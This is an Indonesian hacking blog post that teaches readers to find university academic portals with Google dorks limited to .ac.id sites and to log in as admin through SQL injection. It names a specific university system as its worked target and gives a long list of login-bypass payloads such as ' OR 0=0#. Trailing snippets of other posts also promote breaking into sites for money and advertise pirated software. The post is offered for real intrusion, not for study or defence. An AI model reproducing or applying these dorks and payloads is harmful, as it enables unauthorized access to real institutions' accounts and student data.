kali ni 'anonymous'akan meng-share exploit dari bang Barrabravaz dari surabayablackhat exploit ini memang baru dishare di forum tapi banyak kurang mengerti bagaimana caranya :
pertama kita masukkan google dork berikut
Code:
inurl:"/index.php?mnux="
inurl:"/index.php?mnux=" site:ac.id
USE YOUR BRAIN
atau klik
disini banyak disitu targetnya kan
kita pilih salah satu aja dan gak semua bisa diexploit lho :
![[Image: QnK9m1V.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vAoJ5MkePkMpGIwB9EXiYUfCfWOQpazg-JCiSEmPcbrTCAcwedwoZMQ1q_P4P-po9BndtTNo0188RTxUi4CE_ZhA=s0-d)
kali ini saya akan memberi satu contoh yaitu :
SIA UNIVERSITAS TULUNGAGUNGnah digambar tadi ada kan SIA UNIVERSITAS TULUNGAGUNG kita klik saja pasti masuk halaman login seperti ini :
![[Image: MLlh8rm.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vq_og-VtA7mGVR4YKFynHWMxGIw910cMMOlnRs1K0aZr1eWYMr3EvbGPQ_0zwApShWoufFuFfFyrwPW56LQCfmrg=s0-d)
kita akan exploit dengan Remote Sql Injection gimana caranya yaitu dengan user dan passwrod bypass admin login
user : ' OR 0=0#
pass : ' OR 0=0#
![[Image: YqFFKdM.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uFf19lIRgquXjmXkcm3uUjd220h8fQwL9N5hWgkH2ZAdXEk5gpT4EAborWCxswN5Q1vDM1nle7ex6Q4aW4FHbC3w=s0-d)
kita cobak login bisa kan login dengan user dan password itu
:wus::wus:
![[Image: gbs4.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sKTcK5J2sLLv46b-9B-rTqp8l49g6lP81olm50puMQA42-13tTY7fy1APfUvOCYbvPiFuvHOJHQ9L2bvHZx0WSUDrMRGsmynigxKsBlDcXAPE=s0-d)
tara kita masuk dech, tapi gak pasti kita masuk kadang jadi superuser, admin, dan mahasiswa , hhehehehe
nih berikut user password list SQL injection Baypass
Code:
admin'--
= 'or' 1=1
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
pokoknya kita cobak satu persatu aja siapa tahu nyantol
Berbagi itu indah... kali ni lebih indah dapet $$ lagnsung ajjha yang mau bobol... ketauan bukan salah ane ye... Quote: inurl:".php?cat...
Macromedia Dreamweaver 8 Full Version Free Download Free Download Macromedia Dreamweaver 8 Full Version Macromedia Dreamweaver 8 is that t...
Fungsi tool ini pastinya ente sudah tau kan ? yaitu untuk mencari bug pada Com_JCE dalam satu server ! Bahan : Python Script Scanner JCE NB ...
